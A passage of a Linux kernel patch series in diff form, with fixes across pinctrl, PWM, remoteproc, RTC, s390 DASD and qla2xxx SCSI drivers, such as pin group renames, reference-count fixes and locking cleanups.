+ 	SH_PFC_PIN_GROUP(i2c0),
+ 	SH_PFC_PIN_GROUP(i2c1),
+@@ -2636,18 +2630,18 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(pcie0_clkreq_n),
+ 	SH_PFC_PIN_GROUP(pcie1_clkreq_n),
+ 
+-	SH_PFC_PIN_GROUP(pwm0_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm0),
+ 	SH_PFC_PIN_GROUP(pwm1_a),
+ 	SH_PFC_PIN_GROUP(pwm1_b),
+-	SH_PFC_PIN_GROUP(pwm2_b),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm2),
+ 	SH_PFC_PIN_GROUP(pwm3_a),
+ 	SH_PFC_PIN_GROUP(pwm3_b),
+ 	SH_PFC_PIN_GROUP(pwm4),
+ 	SH_PFC_PIN_GROUP(pwm5),
+ 	SH_PFC_PIN_GROUP(pwm6),
+ 	SH_PFC_PIN_GROUP(pwm7),
+-	SH_PFC_PIN_GROUP(pwm8_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(pwm9_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm8),
++	SH_PFC_PIN_GROUP(pwm9),
+ 
+ 	SH_PFC_PIN_GROUP(qspi0_ctrl),
+ 	BUS_DATA_PIN_GROUP(qspi0_data, 2),
+@@ -2659,18 +2653,18 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(scif0_data),
+ 	SH_PFC_PIN_GROUP(scif0_clk),
+ 	SH_PFC_PIN_GROUP(scif0_ctrl),
+-	SH_PFC_PIN_GROUP(scif1_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_data_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_clk_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_ctrl_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_data_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_clk_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_ctrl_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(scif1_data_a),
++	SH_PFC_PIN_GROUP(scif1_clk_a),
++	SH_PFC_PIN_GROUP(scif1_ctrl_a),
++	SH_PFC_PIN_GROUP(scif1_data_b),
++	SH_PFC_PIN_GROUP(scif1_clk_b),
++	SH_PFC_PIN_GROUP(scif1_ctrl_b),
++	SH_PFC_PIN_GROUP(scif3_data_a),
++	SH_PFC_PIN_GROUP(scif3_clk_a),
++	SH_PFC_PIN_GROUP(scif3_ctrl_a),
++	SH_PFC_PIN_GROUP(scif3_data_b),
++	SH_PFC_PIN_GROUP(scif3_clk_b),
++	SH_PFC_PIN_GROUP(scif3_ctrl_b),
+ 	SH_PFC_PIN_GROUP(scif4_data),
+ 	SH_PFC_PIN_GROUP(scif4_clk),
+ 	SH_PFC_PIN_GROUP(scif4_ctrl),
+@@ -2680,14 +2674,14 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(ssi_data),
+ 	SH_PFC_PIN_GROUP(ssi_ctrl),
+ 
+-	SH_PFC_PIN_GROUP(tpu_to0),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to0_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to1),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to1_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to2),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to2_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to3),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to3_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(tpu_to0_a),
++	SH_PFC_PIN_GROUP(tpu_to0_b),
++	SH_PFC_PIN_GROUP(tpu_to1_a),
++	SH_PFC_PIN_GROUP(tpu_to1_b),
++	SH_PFC_PIN_GROUP(tpu_to2_a),
++	SH_PFC_PIN_GROUP(tpu_to2_b),
++	SH_PFC_PIN_GROUP(tpu_to3_a),
++	SH_PFC_PIN_GROUP(tpu_to3_b),
+ 
+ 	SH_PFC_PIN_GROUP(tsn0_link),
+ 	SH_PFC_PIN_GROUP(tsn0_phy_int),
+@@ -2756,8 +2750,7 @@ static const char * const canfd4_groups[] = {
+ };
+ 
+ static const char * const canfd5_groups[] = {
+-	/* suffix might be updated */
+-	"canfd5_data",
++	"canfd5_data_a",
+ 	"canfd5_data_b",
+ };
+ 
+@@ -2780,13 +2773,12 @@ static const char * const hscif0_groups[] = {
+ };
+ 
+ static const char * const hscif1_groups[] = {
+-	/* suffix might be updated */
+-	"hscif1_data",
+-	"hscif1_clk",
+-	"hscif1_ctrl",
+-	"hscif1_data_x",
+-	"hscif1_clk_x",
+-	"hscif1_ctrl_x",
++	"hscif1_data_a",
++	"hscif1_clk_a",
++	"hscif1_ctrl_a",
++	"hscif1_data_b",
++	"hscif1_clk_b",
++	"hscif1_ctrl_b",
+ };
+ 
+ static const char * const hscif2_groups[] = {
+@@ -2796,13 +2788,12 @@ static const char * const hscif2_groups[] = {
+ };
+ 
+ static const char * const hscif3_groups[] = {
+-	/* suffix might be updated */
+-	"hscif3_data",
+-	"hscif3_clk",
+-	"hscif3_ctrl",
+ 	"hscif3_data_a",
+ 	"hscif3_clk_a",
+ 	"hscif3_ctrl_a",
++	"hscif3_data_b",
++	"hscif3_clk_b",
++	"hscif3_ctrl_b",
+ };
+ 
+ static const char * const i2c0_groups[] = {
+@@ -2899,8 +2890,7 @@ static const char * const pcie_groups[] = {
+ };
+ 
+ static const char * const pwm0_groups[] = {
+-	/* suffix might be updated */
+-	"pwm0_a",
++	"pwm0",
+ };
+ 
+ static const char * const pwm1_groups[] = {
+@@ -2909,8 +2899,7 @@ static const char * const pwm1_groups[] = {
+ };
+ 
+ static const char * const pwm2_groups[] = {
+-	/* suffix might be updated */
+-	"pwm2_b",
++	"pwm2",
+ };
+ 
+ static const char * const pwm3_groups[] = {
+@@ -2935,13 +2924,11 @@ static const char * const pwm7_groups[] = {
+ };
+ 
+ static const char * const pwm8_groups[] = {
+-	/* suffix might be updated */
+-	"pwm8_a",
++	"pwm8",
+ };
+ 
+ static const char * const pwm9_groups[] = {
+-	/* suffix might be updated */
+-	"pwm9_a",
++	"pwm9",
+ };
+ 
+ static const char * const qspi0_groups[] = {
+@@ -2963,23 +2950,21 @@ static const char * const scif0_groups[] = {
+ };
+ 
+ static const char * const scif1_groups[] = {
+-	/* suffix might be updated */
+-	"scif1_data",
+-	"scif1_clk",
+-	"scif1_ctrl",
+-	"scif1_data_x",
+-	"scif1_clk_x",
+-	"scif1_ctrl_x",
++	"scif1_data_a",
++	"scif1_clk_a",
++	"scif1_ctrl_a",
++	"scif1_data_b",
++	"scif1_clk_b",
++	"scif1_ctrl_b",
+ };
+ 
+ static const char * const scif3_groups[] = {
+-	/* suffix might be updated */
+-	"scif3_data",
+-	"scif3_clk",
+-	"scif3_ctrl",
+ 	"scif3_data_a",
+ 	"scif3_clk_a",
+ 	"scif3_ctrl_a",
++	"scif3_data_b",
++	"scif3_clk_b",
++	"scif3_ctrl_b",
+ };
+ 
+ static const char * const scif4_groups[] = {
+@@ -3002,15 +2987,14 @@ static const char * const ssi_groups[] = {
+ };
+ 
+ static const char * const tpu_groups[] = {
+-	/* suffix might be updated */
+-	"tpu_to0",
+ 	"tpu_to0_a",
+-	"tpu_to1",
++	"tpu_to0_b",
+ 	"tpu_to1_a",
+-	"tpu_to2",
++	"tpu_to1_b",
+ 	"tpu_to2_a",
+-	"tpu_to3",
++	"tpu_to2_b",
+ 	"tpu_to3_a",
++	"tpu_to3_b",
+ };
+ 
+ static const char * const tsn0_groups[] = {
+diff --git a/drivers/pinctrl/ti/pinctrl-ti-iodelay.c b/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
+index 4e2382778d38f..f3411e3eaf2ea 100644
+--- a/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
++++ b/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
+@@ -883,7 +883,7 @@ static int ti_iodelay_probe(struct platform_device *pdev)
+ 	iod->desc.name = dev_name(dev);
+ 	iod->desc.owner = THIS_MODULE;
+ 
+-	ret = pinctrl_register_and_init(&iod->desc, dev, iod, &iod->pctl);
++	ret = devm_pinctrl_register_and_init(dev, &iod->desc, iod, &iod->pctl);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register pinctrl\n");
+ 		goto exit_out;
+@@ -891,7 +891,11 @@ static int ti_iodelay_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, iod);
+ 
+-	return pinctrl_enable(iod->pctl);
++	ret = pinctrl_enable(iod->pctl);
++	if (ret)
++		goto exit_out;
++
++	return 0;
+ 
+ exit_out:
+ 	of_node_put(np);
+@@ -908,12 +912,6 @@ static int ti_iodelay_remove(struct platform_device *pdev)
+ {
+ 	struct ti_iodelay_device *iod = platform_get_drvdata(pdev);
+ 
+-	if (!iod)
+-		return 0;
+-
+-	if (iod->pctl)
+-		pinctrl_unregister(iod->pctl);
+-
+ 	ti_iodelay_pinconf_deinit_dev(iod);
+ 
+ 	/* Expect other allocations to be freed by devm */
+diff --git a/drivers/platform/chrome/cros_ec_debugfs.c b/drivers/platform/chrome/cros_ec_debugfs.c
+index 4e63adf083ea1..b19207f3aecfe 100644
+--- a/drivers/platform/chrome/cros_ec_debugfs.c
++++ b/drivers/platform/chrome/cros_ec_debugfs.c
+@@ -326,6 +326,7 @@ static int ec_read_version_supported(struct cros_ec_dev *ec)
+ 	if (!msg)
+ 		return 0;
+ 
++	msg->version = 1;
+ 	msg->command = EC_CMD_GET_CMD_VERSIONS + ec->cmd_offset;
+ 	msg->outsize = sizeof(*params);
+ 	msg->insize = sizeof(*response);
+diff --git a/drivers/platform/mips/cpu_hwmon.c b/drivers/platform/mips/cpu_hwmon.c
+index d8c5f9195f85f..2ac2f31090f96 100644
+--- a/drivers/platform/mips/cpu_hwmon.c
++++ b/drivers/platform/mips/cpu_hwmon.c
+@@ -139,6 +139,9 @@ static int __init loongson_hwmon_init(void)
+ 		csr_temp_enable = csr_readl(LOONGSON_CSR_FEATURES) &
+ 				  LOONGSON_CSRF_TEMP;
+ 
++	if (!csr_temp_enable && !loongson_chiptemp[0])
++		return -ENODEV;
++
+ 	nr_packages = loongson_sysconf.nr_cpus /
+ 		loongson_sysconf.cores_per_package;
+ 
+diff --git a/drivers/pwm/pwm-atmel-tcb.c b/drivers/pwm/pwm-atmel-tcb.c
+index 2826fc216d291..e74b45f00a9ac 100644
+--- a/drivers/pwm/pwm-atmel-tcb.c
++++ b/drivers/pwm/pwm-atmel-tcb.c
+@@ -34,7 +34,6 @@
+ 				 ATMEL_TC_BEEVT | ATMEL_TC_BSWTRG)
+ 
+ struct atmel_tcb_pwm_device {
+-	enum pwm_polarity polarity;	/* PWM polarity */
+ 	unsigned div;			/* PWM clock divider */
+ 	unsigned duty;			/* PWM duty expressed in clk cycles */
+ 	unsigned period;		/* PWM period expressed in clk cycles */
+@@ -57,7 +56,7 @@ struct atmel_tcb_pwm_chip {
+ 	struct clk *clk;
+ 	struct clk *gclk;
+ 	struct clk *slow_clk;
+-	struct atmel_tcb_pwm_device *pwms[NPWM];
++	struct atmel_tcb_pwm_device pwms[NPWM];
+ 	struct atmel_tcb_channel bkup;
+ };
+ 
+@@ -68,42 +67,24 @@ static inline struct atmel_tcb_pwm_chip *to_tcb_chip(struct pwm_chip *chip)
+ 	return container_of(chip, struct atmel_tcb_pwm_chip, chip);
+ }
+ 
+-static int atmel_tcb_pwm_set_polarity(struct pwm_chip *chip,
+-				      struct pwm_device *pwm,
+-				      enum pwm_polarity polarity)
+-{
+-	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
+-
+-	tcbpwm->polarity = polarity;
+-
+-	return 0;
+-}
+-
+ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ 				 struct pwm_device *pwm)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm;
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	unsigned cmr;
+ 	int ret;
+ 
+-	tcbpwm = devm_kzalloc(chip->dev, sizeof(*tcbpwm), GFP_KERNEL);
+-	if (!tcbpwm)
+-		return -ENOMEM;
+-
+ 	ret = clk_prepare_enable(tcbpwmc->clk);
+-	if (ret) {
+-		devm_kfree(chip->dev, tcbpwm);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	tcbpwm->polarity = PWM_POLARITY_NORMAL;
+ 	tcbpwm->duty = 0;
+ 	tcbpwm->period = 0;
+ 	tcbpwm->div = 0;
+ 
+-	spin_lock(&tcbpwmc->lock);
++	guard(spinlock)(&tcbpwmc->lock);
++
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 	/*
+ 	 * Get init config from Timer Counter registers if
+@@ -129,9 +110,6 @@ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ 
+ 	cmr |= ATMEL_TC_WAVE | ATMEL_TC_WAVESEL_UP_AUTO | ATMEL_TC_EEVT_XC0;
+ 	regmap_write(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), cmr);
+-	spin_unlock(&tcbpwmc->lock);
+-
+-	tcbpwmc->pwms[pwm->hwpwm] = tcbpwm;
+ 
+ 	return 0;
+ }
+@@ -139,19 +117,16 @@ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ static void atmel_tcb_pwm_free(struct pwm_chip *chip, struct pwm_device *pwm)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
+ 
+ 	clk_disable_unprepare(tcbpwmc->clk);
+-	tcbpwmc->pwms[pwm->hwpwm] = NULL;
+-	devm_kfree(chip->dev, tcbpwm);
+ }
+ 
+-static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
++static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm,
++				  enum pwm_polarity polarity)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	unsigned cmr;
+-	enum pwm_polarity polarity = tcbpwm->polarity;
+ 
+ 	/*
+ 	 * If duty is 0 the timer will be stopped and we have to
+@@ -164,7 +139,6 @@ static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (tcbpwm->duty == 0)
+ 		polarity = !polarity;
+ 
+-	spin_lock(&tcbpwmc->lock);
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 
+ 	/* flush old setting and set the new one */
+@@ -199,16 +173,14 @@ static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 			     ATMEL_TC_SWTRG);
+ 		tcbpwmc->bkup.enabled = 0;
+ 	}
+-
+-	spin_unlock(&tcbpwmc->lock);
+ }
+ 
+-static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
++static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm,
++				enum pwm_polarity polarity)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	u32 cmr;
+-	enum pwm_polarity polarity = tcbpwm->polarity;
+ 
+ 	/*
+ 	 * If duty is 0 the timer will be stopped and we have to
+@@ -221,7 +193,6 @@ static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (tcbpwm->duty == 0)
+ 		polarity = !polarity;
+ 
+-	spin_lock(&tcbpwmc->lock);
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 
+ 	/* flush old setting and set the new one */
+@@ -283,7 +254,6 @@ static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	regmap_write(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CCR),
+ 		     ATMEL_TC_SWTRG | ATMEL_TC_CLKEN);
+ 	tcbpwmc->bkup.enabled = 1;
+-	spin_unlock(&tcbpwmc->lock);
+ 	return 0;
+ }
+ 
+@@ -291,7 +261,7 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 				int duty_ns, int period_ns)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	struct atmel_tcb_pwm_device *atcbpwm = NULL;
+ 	int i = 0;
+ 	int slowclk = 0;
+@@ -338,9 +308,9 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	period = div_u64(period_ns, min);
+ 
+ 	if (pwm->hwpwm == 0)
+-		atcbpwm = tcbpwmc->pwms[1];
++		atcbpwm = &tcbpwmc->pwms[1];
+ 	else
+-		atcbpwm = tcbpwmc->pwms[0];
++		atcbpwm = &tcbpwmc->pwms[0];
+ 
+ 	/*
+ 	 * PWM devices provided by the TCB driver are grouped by 2.
+@@ -368,14 +338,14 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ static int atmel_tcb_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 			       const struct pwm_state *state)
+ {
++	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+ 	int duty_cycle, period;
+ 	int ret;
+ 
+-	/* This function only sets a flag in driver data */
+-	atmel_tcb_pwm_set_polarity(chip, pwm, state->polarity);
++	guard(spinlock)(&tcbpwmc->lock);
+ 
+ 	if (!state->enabled) {
+-		atmel_tcb_pwm_disable(chip, pwm);
++		atmel_tcb_pwm_disable(chip, pwm, state->polarity);
+ 		return 0;
+ 	}
+ 
+@@ -386,7 +356,7 @@ static int atmel_tcb_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (ret)
+ 		return ret;
+ 
+-	return atmel_tcb_pwm_enable(chip, pwm);
++	return atmel_tcb_pwm_enable(chip, pwm, state->polarity);
+ }
+ 
+ static const struct pwm_ops atmel_tcb_pwm_ops = {
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index c40a6548ce7d4..2070d107c6328 100644
+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -452,8 +452,9 @@ static int stm32_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	enabled = pwm->state.enabled;
+ 
+-	if (enabled && !state->enabled) {
+-		stm32_pwm_disable(priv, pwm->hwpwm);
++	if (!state->enabled) {
++		if (enabled)
++			stm32_pwm_disable(priv, pwm->hwpwm);
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 8a2a7112678c2..bc26fe5416627 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -596,31 +596,37 @@ static int imx_rproc_addr_init(struct imx_rproc *priv,
+ 		struct resource res;
+ 
+ 		node = of_parse_phandle(np, "memory-region", a);
++		if (!node)
++			continue;
+ 		/* Not map vdevbuffer, vdevring region */
+ 		if (!strncmp(node->name, "vdev", strlen("vdev"))) {
+ 			of_node_put(node);
+ 			continue;
+ 		}
+ 		err = of_address_to_resource(node, 0, &res);
+-		of_node_put(node);
+ 		if (err) {
+ 			dev_err(dev, "unable to resolve memory region\n");
++			of_node_put(node);
+ 			return err;
+ 		}
+ 
+-		if (b >= IMX_RPROC_MEM_MAX)
++		if (b >= IMX_RPROC_MEM_MAX) {
++			of_node_put(node);
+ 			break;
++		}
+ 
+ 		/* Not use resource version, because we might share region */
+ 		priv->mem[b].cpu_addr = devm_ioremap_wc(&pdev->dev, res.start, resource_size(&res));
+ 		if (!priv->mem[b].cpu_addr) {
+ 			dev_err(dev, "failed to remap %pr\n", &res);
++			of_node_put(node);
+ 			return -ENOMEM;
+ 		}
+ 		priv->mem[b].sys_addr = res.start;
+ 		priv->mem[b].size = resource_size(&res);
+ 		if (!strcmp(node->name, "rsc-table"))
+ 			priv->rsc_table = priv->mem[b].cpu_addr;
++		of_node_put(node);
+ 		b++;
+ 	}
+ 
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 74da0393172c5..d88220a8fb0c3 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -293,7 +293,7 @@ static void stm32_rproc_mb_vq_work(struct work_struct *work)
+ 
+ 	mutex_lock(&rproc->lock);
+ 
+-	if (rproc->state != RPROC_RUNNING)
++	if (rproc->state != RPROC_RUNNING && rproc->state != RPROC_ATTACHED)
+ 		goto unlock_mutex;
+ 
+ 	if (rproc_vq_interrupt(rproc, mb->vq_id) == IRQ_NONE)
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 3d0fbc644f578..c928037bf6f3a 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -274,10 +274,9 @@ int __rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 			return err;
+ 
+ 		/* full-function RTCs won't have such missing fields */
+-		if (rtc_valid_tm(&alarm->time) == 0) {
+-			rtc_add_offset(rtc, &alarm->time);
+-			return 0;
+-		}
++		err = rtc_valid_tm(&alarm->time);
++		if (!err)
++			goto done;
+ 
+ 		/* get the "after" timestamp, to detect wrapped fields */
+ 		err = rtc_read_time(rtc, &now);
+@@ -379,6 +378,8 @@ int __rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 	if (err)
+ 		dev_warn(&rtc->dev, "invalid alarm value: %ptR\n",
+ 			 &alarm->time);
++	else
++		rtc_add_offset(rtc, &alarm->time);
+ 
+ 	return err;
+ }
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index e0a798923ce0e..542568cd72b32 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -643,11 +643,10 @@ static int cmos_nvram_read(void *priv, unsigned int off, void *val,
+ 			   size_t count)
+ {
+ 	unsigned char *buf = val;
+-	int	retval;
+ 
+ 	off += NVRAM_OFFSET;
+ 	spin_lock_irq(&rtc_lock);
+-	for (retval = 0; count; count--, off++, retval++) {
++	for (; count; count--, off++) {
+ 		if (off < 128)
+ 			*buf++ = CMOS_READ(off);
+ 		else if (can_bank2)
+@@ -657,7 +656,7 @@ static int cmos_nvram_read(void *priv, unsigned int off, void *val,
+ 	}
+ 	spin_unlock_irq(&rtc_lock);
+ 
+-	return retval;
++	return count ? -EIO : 0;
+ }
+ 
+ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+@@ -665,7 +664,6 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ {
+ 	struct cmos_rtc	*cmos = priv;
+ 	unsigned char	*buf = val;
+-	int		retval;
+ 
+ 	/* NOTE:  on at least PCs and Ataris, the boot firmware uses a
+ 	 * checksum on part of the NVRAM data.  That's currently ignored
+@@ -674,7 +672,7 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ 	 */
+ 	off += NVRAM_OFFSET;
+ 	spin_lock_irq(&rtc_lock);
+-	for (retval = 0; count; count--, off++, retval++) {
++	for (; count; count--, off++) {
+ 		/* don't trash RTC registers */
+ 		if (off == cmos->day_alrm
+ 				|| off == cmos->mon_alrm
+@@ -689,7 +687,7 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ 	}
+ 	spin_unlock_irq(&rtc_lock);
+ 
+-	return retval;
++	return count ? -EIO : 0;
+ }
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/rtc/rtc-isl1208.c b/drivers/rtc/rtc-isl1208.c
+index f448a525333e1..2615b2cf8334a 100644
+--- a/drivers/rtc/rtc-isl1208.c
++++ b/drivers/rtc/rtc-isl1208.c
+@@ -743,14 +743,13 @@ static int isl1208_nvmem_read(void *priv, unsigned int off, void *buf,
+ {
+ 	struct isl1208_state *isl1208 = priv;
+ 	struct i2c_client *client = to_i2c_client(isl1208->rtc->dev.parent);
+-	int ret;
+ 
+ 	/* nvmem sanitizes offset/count for us, but count==0 is possible */
+ 	if (!count)
+ 		return count;
+-	ret = isl1208_i2c_read_regs(client, ISL1208_REG_USR1 + off, buf,
++
++	return isl1208_i2c_read_regs(client, ISL1208_REG_USR1 + off, buf,
+ 				    count);
+-	return ret == 0 ? count : ret;
+ }
+ 
+ static int isl1208_nvmem_write(void *priv, unsigned int off, void *buf,
+@@ -758,15 +757,13 @@ static int isl1208_nvmem_write(void *priv, unsigned int off, void *buf,
+ {
+ 	struct isl1208_state *isl1208 = priv;
+ 	struct i2c_client *client = to_i2c_client(isl1208->rtc->dev.parent);
+-	int ret;
+ 
+ 	/* nvmem sanitizes off/count for us, but count==0 is possible */
+ 	if (!count)
+ 		return count;
+-	ret = isl1208_i2c_set_regs(client, ISL1208_REG_USR1 + off, buf,
+-				   count);
+ 
+-	return ret == 0 ? count : ret;
++	return isl1208_i2c_set_regs(client, ISL1208_REG_USR1 + off, buf,
++				   count);
+ }
+ 
+ static const struct nvmem_config isl1208_nvmem_config = {
+diff --git a/drivers/s390/block/dasd_devmap.c b/drivers/s390/block/dasd_devmap.c
+index b2a4c34330573..1129f6ae98b57 100644
+--- a/drivers/s390/block/dasd_devmap.c
++++ b/drivers/s390/block/dasd_devmap.c
+@@ -2135,13 +2135,19 @@ static ssize_t dasd_copy_pair_store(struct device *dev,
+ 
+ 	/* allocate primary devmap if needed */
+ 	prim_devmap = dasd_find_busid(prim_busid);
+-	if (IS_ERR(prim_devmap))
++	if (IS_ERR(prim_devmap)) {
+ 		prim_devmap = dasd_add_busid(prim_busid, DASD_FEATURE_DEFAULT);
++		if (IS_ERR(prim_devmap))
++			return PTR_ERR(prim_devmap);
++	}
+ 
+ 	/* allocate secondary devmap if needed */
+ 	sec_devmap = dasd_find_busid(sec_busid);
+-	if (IS_ERR(sec_devmap))
++	if (IS_ERR(sec_devmap)) {
+ 		sec_devmap = dasd_add_busid(sec_busid, DASD_FEATURE_DEFAULT);
++		if (IS_ERR(sec_devmap))
++			return PTR_ERR(sec_devmap);
++	}
+ 
+ 	/* setting copy relation is only allowed for offline secondary */
+ 	if (sec_devmap->device)
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index 19bb64bdd88b1..52dc9604f5674 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -324,7 +324,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		    "request_sg_cnt=%x reply_sg_cnt=%x.\n",
+ 		    bsg_job->request_payload.sg_cnt,
+ 		    bsg_job->reply_payload.sg_cnt);
+-		rval = -EPERM;
++		rval = -ENOBUFS;
+ 		goto done;
+ 	}
+ 
+@@ -3059,17 +3059,61 @@ qla24xx_bsg_request(struct bsg_job *bsg_job)
+ 	return ret;
+ }
+ 
+-int
+-qla24xx_bsg_timeout(struct bsg_job *bsg_job)
++static bool qla_bsg_found(struct qla_qpair *qpair, struct bsg_job *bsg_job)
+ {
++	bool found = false;
+ 	struct fc_bsg_reply *bsg_reply = bsg_job->reply;
+ 	scsi_qla_host_t *vha = shost_priv(fc_bsg_to_shost(bsg_job));
+ 	struct qla_hw_data *ha = vha->hw;
+-	srb_t *sp;
+-	int cnt, que;
++	srb_t *sp = NULL;
++	int cnt;
+ 	unsigned long flags;
+ 	struct req_que *req;
+ 
++	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++	req = qpair->req;
++
++	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
++		sp = req->outstanding_cmds[cnt];
++		if (sp &&
++		    (sp->type == SRB_CT_CMD ||
++		     sp->type == SRB_ELS_CMD_HST ||
++		     sp->type == SRB_ELS_CMD_HST_NOLOGIN) &&
++		    sp->u.bsg_job == bsg_job) {
++			req->outstanding_cmds[cnt] = NULL;
++			spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
